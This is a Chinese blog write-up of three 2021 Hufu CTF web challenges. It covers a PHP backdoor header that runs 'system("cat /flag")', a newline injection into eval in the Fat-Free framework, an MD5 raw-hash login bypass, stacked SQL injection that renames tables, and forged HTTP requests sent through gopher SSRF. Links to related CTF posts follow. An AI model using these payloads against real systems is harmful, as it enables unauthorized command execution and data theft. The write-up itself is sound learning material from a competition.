2021虎符CTF-Web前三题

最新推荐文章于 2023-09-21 23:07:45 发布
最新推荐文章于 2023-09-21 23:07:45 发布
阅读量1.6k 收藏 3
点赞数 4
CC 4.0 BY-SA版权
分类专栏: # 比赛WP总结 安全学习 # Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/115425706
本文揭秘了PHP中Unset漏洞的利用过程,从fatfree框架入手,通过Bypass技巧绕过过滤,详细讲述了如何执行命令、绕过登录验证,并最终获取flag。涉及的知识点包括eval、参数注入、权限提升和Web应用安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

web

签到

一个最近刚爆出来的php后门,直接一把梭

User-Agentt: zerodiumsystem("cat /flag");

unset

一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻

syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.php(530) : eval()'d code:1]

在eval前加了个echo发现真的调用连,

unset($this->hive['后面是我们a=的内容

发现有过滤太长了吧,自己本独测试发现有phpinfo但是后面执行命令不行

a=a[%27phpinfo%27()]

尝试执行

?a=a[%27system%27(ls)]

但是多了空格不行换个思路

尝试php几种常用bypass,日常fuzz发现%0a加上直接成功闭合还能绕过后面过滤,然后芜湖起飞,闭合前面中间任意执行绕过过滤注释后面

?a=1%0a);system('cat /flag');//

慢慢做管理系统

MD5-true的登录过滤前面用后面

ffifdyop和129581926211651571912466741651878684928

进去后我各种姿势失败

username=0';show tables;%23&password=1

之后

username=admin';show columns from real_admin_here_do_you_find ;#&password=a

尝试很多堆叠注入姿势失败,prepare和set也不能同时出现

发现可以改表名

rename tables fake_admin to fuck ; rename tables real_admin_here_do_you_find to fake_admin ;

然后的都

admin密码是5fb4e07de914cfc82afb44vbaf402203

然后用gopher发送下面这个获取cookie后

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

再发

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=c3bv46re495tugnt3vegmo25d2;

页面即可获得flag,做完这题人累死了哭哭

虎符CTF 2022 mva
weixin_46483787的博客
03-21 1061
言: 昨天刚结束的虎符CTF的一道,开始的太晚了,比赛结束半个小时才做出来,略显可惜 逆向分析: 拿到程序,稍做处理后可以看到,首先是让我们输入一段0x100的字节,然后开始取指-执行-取指-执行的过程,实现了一个小型的计算系统 然后我们简单的进行一些重命名,识别出一些结构来: 如push和pop: 设置寄存器的值 以及一些加减乘除和寄存器赋值等操作就不一一放截图了 漏洞 我们熟知VM的漏洞基本都是边界检测的问,sp的检测啊,寄存器指针的检测啊等等,本也不例外 首先发现的是这两个地方: c
2021虎符ctf-逆向
qq_37439229的博客
04-04 3289
red… mips架构,nmsl GoEncrypt 输入符合正则格式的flag:flag{11111111-1111-1111-1111-111111111111}, 除了”-“的其他hex编码 ,之后分成2组 xtea,脚本 抄百度就行 #include<stdio.h> #include<stdlib.h> #define uint32_t unsigned int void encipher(unsigned int num_rounds, uint32_t v[2], ui
[虎符CTF 2021]Internal System
cjdgg的博客
11-02 3655
[虎符CTF 2021]Internal System 虎符的这看到很多大佬都在说这道很好,所以找来做一做 这一开始根据提示/source有东西,可以直接找到源代码 const express = require('express') const router = express.Router() const axios = require('axios') const isIp = require('is-ip') const IP = require('ip') const UrlPars
虎符ctf2021 web writeup
weixin_45805993的博客
04-09 1048
1.签到 https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d php git仓库后门 2.unsetme 源码 <?php // Kickstart the framework $f3=require('lib/base.php'); $f3->set('DEBUG',0); if ((float)PCRE_VERSION<8.0) trigger_error('PCRE v
game 虎符CTF
re1wn
04-24 1142
神仙打架,萌新吃瓜
虎符创新大赛(web部分)
weixin_43610673的博客
04-23 668
easy_login 目说明: 最近正在开始学习nodejs开发,不如先写个登陆界面练练手。什么,大佬说我的程序有bug?我写的代码逻辑完美顺利运行怎么可能出错?!错的一定是我的依赖库!! 提示说目依赖库存在问。 打开是个登录框 尝试注册admin用户,按提示来看应该已经有admin用户了,需要登录admin账号获取flag 查看源码 是登录注册等功能的一些函数,顶部有提示(比赛的时...
BugkuCTF-MISC虎符
am_03的博客
09-04 575
补充: firework类型:1.处理firework标志的图像;2.常见图片解析:图层分解,帧分解 解: 拿到一个wim文件,直接解压,也可以binwalk梭出来。得到两个文件夹,先看“左”。 图片文件尾部有额外数据,提取出来是一个加密的压缩包 hint.txt给了提示: hint: password并不单一 password: 王大 王井 王井 这个是当铺密码,解出来是65 68 68,不过换了几类形式提交都不正确,这里的并不单一也不知道是什么意思,然后就扔着不做了,之后才知道要把组数分别asc
虎符ctf -- vm虚拟机逆向
令则
04-24 2493
文章目录vmdataopcode一些结构还原逆向 一个 调了好久好久的虚拟机目 原本比赛的时候是上午做了个pyc, 下午开始调vm, 调到结束也没弄出来个道道,tcl, 就开始等待大佬们的wp, 好几天过去, 似乎没有??? 走投无路的菜鸡只好自己慢慢逆, 然后写下这个目的wp。 欢迎围观 虎符ctf, vm目, 个人觉得一个比较不错的虚拟机,指令好多,不太好调。 几个简单的虚拟机目...
虎符2020CTF web easylogin.pdf
04-20
从提供的文件内容来看,这篇文档主要讨论了虎符2020CTF (Capture The Flag) 比赛中Web目“easylogin”的解过程。CTF比赛是一种信息安全竞赛,参赛者需要通过解决各种信息安全挑战来获得相应的flag,即密码或...
2021虎符CTF逆向wp
FIshy000的博客
04-10 678
红明谷-g0 看名字就是go语言目,用IDA-golang-helper还原符号表之后,看到只有几个函数,其中main_Encode就是加密函数 函数逻辑比较简单,输入长度等于20,打乱位置,进入main_Encode加密,最后进入main_fun1进行比较,直接看main_Encode中的加密算法 动态调试后发现一张表,表的长度为58位,判断为换表base58加密 进入main_fun1函数中找到加密后的字符串,注意 runtime_memequal这个比较的函数需要在汇编中寻找比较的字符串首地址
虎符CTF2022 handle - MISC
weixin_45760568的博客
03-23 4524
虎符CTF2022 | MISC | handle (2022数字中国创新大赛虎符网络安全赛道) Part of 【COMPASS CTF】 WriteUp by Frankss@COMPASS handle (二血 909pt) 思路 (隔壁某show平台上周刚做过某套神类似的,于是很快就把字典搞出来了,但是交互写了很久丢掉了一血) 思路就是找一个有优势的固定词开头,然后根据返回结果分枝(枝),根据不同枝选择不同的尝试(剪枝),这样接下来要处理的重复量就少很多,重复这个过程两次,几乎每一个可能的词都
虎符CTF--MISC--奇怪的组织
a965527596的博客
04-21 2440
奇怪的组织 1.拿到文件发现是c盘文件,然后发现用phpstudy建了一个dede的站,发现了3个博客和一段密文,但是没有解密的信息。 先试试了base64,结果不对,然后猜测是AES加密,解密需要key,继续从文件中找。 2.官方提示看浏览行为和聊天信息,于是利用places.sqlite文件还原火狐的历史记录,发现bob先是建了dede的站,然后访问了一个emoji的解密网站。...
[ctfshow web入门]常用姿势817-820 &&虎符ctf ezphp
weixin_45751765的博客
05-09 1457
0x00 言 接上一篇继续记录ctfshow web入门常用姿势 嗝 820 非常规文件上传 php中的base64_decode只对合法字符合并后进行解码,非法字符会直接丢弃,不参与整体的base64解码 合法字符包括 A-Za-z0-9/+ 字母26+26 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-04-30 10:52:40 # @Last Modified by: h1xa # @Last Mod
虎符CTF-2022 babygame
CoLin的pwn小屋
04-01 1236
虎符CTF最简单的一道pwn
虎符CTF2022 —shellcode
最新发布
qq_54894802的博客
09-21 439
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
2022虎符CTF-WEB赛后复现
Tajang的大千世界
02-09 700
质量很高
[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
ZXW_NUDT的博客
08-05 3669
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
2021-虎符网络安全赛道-hatenum | exp()函数与正则过滤
一醉一休的博客
09-28 1498
挺质量的一道
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值